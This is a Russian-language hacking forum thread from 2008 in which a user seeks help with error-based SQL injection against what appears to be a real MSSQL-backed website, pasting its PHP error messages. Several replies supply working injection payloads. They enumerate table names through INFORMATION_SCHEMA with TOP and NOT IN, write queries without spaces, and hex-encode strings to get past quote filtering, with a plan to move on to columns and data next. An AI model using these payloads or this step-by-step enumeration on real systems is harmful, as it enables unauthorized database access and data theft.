mssql inj help

Discussion in 'Уязвимости' started by -=megahertz=-, 22 Mar 2008.

  1. -=megahertz=-

    -=megahertz=- Elder - Старейшина

    Joined:
    23 May 2007
    Messages:
    79
    Likes Received:
    16
    Reputations:
    1
    При таком запросе
    "1+or+1=(SELECT+1+TOP+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES)--"
    показывает
    Incorrect syntax near the keyword 'TOP'


    в чем моя ошибка?
     
  2. ~X3RiX~

    ~X3RiX~ Banned

    Joined:
    14 Mar 2008
    Messages:
    22
    Likes Received:
    7
    Reputations:
    -5
    юзай

    http://pentestmonkey.net/blog/mssql-sql-injection-cheat-sheet/
     
  3. guest3297

    guest3297 Banned

    Joined:
    27 Jun 2006
    Messages:
    1,246
    Likes Received:
    639
    Reputations:
    817
    "1+or+1=(SELECT+1+max(TABLE_NAME)+FROM+INFORMATION_SCHEMA.TABLES)--"
     
  4. Scipio

    Scipio Well-Known Member

    Joined:
    2 Nov 2006
    Messages:
    733
    Likes Received:
    544
    Reputations:
    190
    можно проинжектить запрос вобще без использования пробелов:
    or(1=(select(max(table_name))from[information_schema].tables))

    [ cash ] ;)
     
    2 people like this.
  5. -=megahertz=-

    -=megahertz=- Elder - Старейшина

    Joined:
    23 May 2007
    Messages:
    79
    Likes Received:
    16
    Reputations:
    1
    спасиб онотолий, помогло
     
    1 person likes this.
  6. -=megahertz=-

    -=megahertz=- Elder - Старейшина

    Joined:
    23 May 2007
    Messages:
    79
    Likes Received:
    16
    Reputations:
    1
    снова я
    1+or+1=((select((table_name))from[information_schema].tables+where+TABLE_NAME+NOT+IN+('syssegments')))--
    выводит
    'syssegments'
    делаю так
    1+or+1=((select((table_name))from[information_schema].tables+where+TABLE_NAME+NOT+IN+('syssegments','syssegments')))--
    выводит
    'syssegmentssyssegments'
    в след запросе выводит уже
    'syssegmentssyssegmentssyssegmentssyssegments'
    и т.д.
     
  7. ReVOLVeR

    ReVOLVeR Banned

    Joined:
    2 Sep 2006
    Messages:
    170
    Likes Received:
    100
    Reputations:
    32
    TABLE_NAME+NOT+IN+('syssegments','sy ssegments','syssegmentssyssegments'...итд)))--
    таким образом узнаёш все таблицы))
    патом также только для столбцов и формеруеш запрос к бд))
     
  8. -=megahertz=-

    -=megahertz=- Elder - Старейшина

    Joined:
    23 May 2007
    Messages:
    79
    Likes Received:
    16
    Reputations:
    1
    я знаю что так надо
    просто проблема в том что он просто делат так
    syssegments
    syssegmentssyssegments
    syssegmentssyssegmentssyssegmentssyssegments
    syssegmentssyssegmentssyssegmentssyssegmentssyssegmentssyssegments
    ...
    так не должно быть
     
  9. Scipio

    Scipio Well-Known Member

    Joined:
    2 Nov 2006
    Messages:
    733
    Likes Received:
    544
    Reputations:
    190
    -=megahertz=-, покажи полностью, результат выполнения запроса
     
  10. ReVOLVeR

    ReVOLVeR Banned

    Joined:
    2 Sep 2006
    Messages:
    170
    Likes Received:
    100
    Reputations:
    32
    разграничь при помощи ';'
     
  11. guest3297

    guest3297 Banned

    Joined:
    27 Jun 2006
    Messages:
    1,246
    Likes Received:
    639
    Reputations:
    817
    Используй в not+in 0x + hex кодирование.
     
  12. -=megahertz=-

    -=megahertz=- Elder - Старейшина

    Joined:
    23 May 2007
    Messages:
    79
    Likes Received:
    16
    Reputations:
    1
    вот запрос
    id=1+or+1=((select((table_name))from[information_schema].tables+where+TABLE_NAME+NOT+IN+('syssegments','syssegmentssyssegments','syssegmentssyssegmentssyssegments')))--

    ответ
    Warning: mssql_query() [function.mssql-query]: message: Invalid column name 'syssegmentssyssegmentssyssegmentssyssegmentssyssegmentssyssegments'. (severity 16)
    Warning: mssql_query() [function.mssql-query]: Query failed
    Warning: mssql_fetch_assoc(): supplied argument is not a valid MS SQL-result resource
     
  13. Scipio

    Scipio Well-Known Member

    Joined:
    2 Nov 2006
    Messages:
    733
    Likes Received:
    544
    Reputations:
    190
    1+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_S CHEMA.TABLES+where+TABLE_NAME+NOT+IN+((SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_S CHEMA.TABLES))--

    потом

    1+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_S CHEMA.TABLES+where+TABLE_NAME+NOT+IN+((SELECT+TOP+2+TABLE_NAME+FROM+INFORMATION_S CHEMA.TABLES))--

    потом

    1+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_S CHEMA.TABLES+where+TABLE_NAME+NOT+IN+((SELECT+TOP+3+TABLE_NAME+FROM+INFORMATION_S CHEMA.TABLES))--

    и т.д.
     
    1 person likes this.
  14. ReVOLVeR

    ReVOLVeR Banned

    Joined:
    2 Sep 2006
    Messages:
    170
    Likes Received:
    100
    Reputations:
    32
    message: Invalid column name имя калонки неверно...
    'syssegmentssyssegmentssyssegmentssyssegmentssysse gmentssyssegments'-хм мож админы извращенцы так таблицы называть??
     
  15. Scipio

    Scipio Well-Known Member

    Joined:
    2 Nov 2006
    Messages:
    733
    Likes Received:
    544
    Reputations:
    190
    ReVOLVeR, фигню пишешь, просто при обработке запроса скриптом, из него удаляются кавычки и скорее всего запятые
     
  16. -=megahertz=-

    -=megahertz=- Elder - Старейшина

    Joined:
    23 May 2007
    Messages:
    79
    Likes Received:
    16
    Reputations:
    1
    попробовал то что мне скаща scipio
    ответ
    Warning: mssql_query() [function.mssql-query]: message: Incorrect syntax near the keyword 'TOP'. (severity 15)
    Warning: mssql_query() [function.mssql-query]: Query failed
    Warning: mssql_fetch_assoc(): supplied argument is not a valid MS SQL-result resource
     
  17. Scipio

    Scipio Well-Known Member

    Joined:
    2 Nov 2006
    Messages:
    733
    Likes Received:
    544
    Reputations:
    190
    тогда делай:
    (select(max(table_name))from[information_schema].tables+where+table_name<>0x7379737365676D656E7473)

    потом:
    (select(max(table_name))from[information_schema].tables+where+table_name<>0x7379737365676D656E7473+and+table_name<>захексенный результат)

    и т.д. добавляй and`ы
     
  18. -=megahertz=-

    -=megahertz=- Elder - Старейшина

    Joined:
    23 May 2007
    Messages:
    79
    Likes Received:
    16
    Reputations:
    1
    вобщем в hex выводит все время только
    (0x7379737365676D656E7473)syssegments
     
    #18 -=megahertz=-, 22 Mar 2008
    Last edited: 22 Mar 2008
  19. Scipio

    Scipio Well-Known Member

    Joined:
    2 Nov 2006
    Messages:
    733
    Likes Received:
    544
    Reputations:
    190
    напиши запрос который используешь и полностью ошибку
     
  20. -=megahertz=-

    -=megahertz=- Elder - Старейшина

    Joined:
    23 May 2007
    Messages:
    79
    Likes Received:
    16
    Reputations:
    1
    1+or+1=(select(max(table_name))from[information_schema].tables+where+table_name+0x7379737365676D656E7473+and+table_name+0x7379737365676d656e7473+and+table_name+0x7379737365676d656e7473+and+table_name+0x7379737365676d656e7473)--

    вместо <> поставил + так как выводил ерор

    Warning: mssql_query() [function.mssql-query]: message: Line 5: Incorrect syntax near '0x7379737365676d656e7473'. (severity 15)
    Warning: mssql_query() [function.mssql-query]: message: Line 5: Incorrect syntax near '0x7379737365676d656e7473'. (severity 15)
    Warning: mssql_query() [function.mssql-query]: Query failed
    Warning: mssql_fetch_assoc(): supplied argument is not a valid MS SQL-result resource
     
Loading...